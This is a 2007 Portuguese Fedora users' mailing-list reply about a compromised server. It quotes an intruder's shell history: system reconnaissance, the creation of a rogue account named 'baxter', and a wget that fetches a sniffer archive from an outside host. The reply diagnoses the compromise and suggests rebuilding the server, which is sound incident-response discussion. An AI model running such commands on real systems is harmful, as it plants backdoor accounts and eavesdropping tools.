[Fedora-users-br] Dúvida sobre alguns comandos

André Felício andre em felicio.com.br
Ter Mar 27 13:51:06 UTC 2007

Rau,

A Monday 26 March 2007 15:39:25, Alexandre Singulani escreveu:
> o arquivo ta aqui sim, ele não apagou..... mas pelo jeito ele não conseguiu
> fazer muita coisa, assim espero....
> abaixo os comandos que ele executou

> uname -a
> cat /proc/cpuinfo
> ps x
> ps aux
> history
> group
> groups
> adduser
> adduser baxter
> passwd baxter
> wget apocalipsa.org/.apocalipsa/sniff.tar
> [...]

Bem, seu servidor foi comprometido e a pessoa que fez isso não é lá muito
inteligente! (burrinho...)

Na duvida, eu tiraria ele de produção só por garantia e montaria um outro.

--
Att,

André Felício
http://www.felicio.com.br

 Hmm... Which would do a better job at driving physicists crazy? Travel faster
than light, or a floating-point boolean value? -- Michael Mol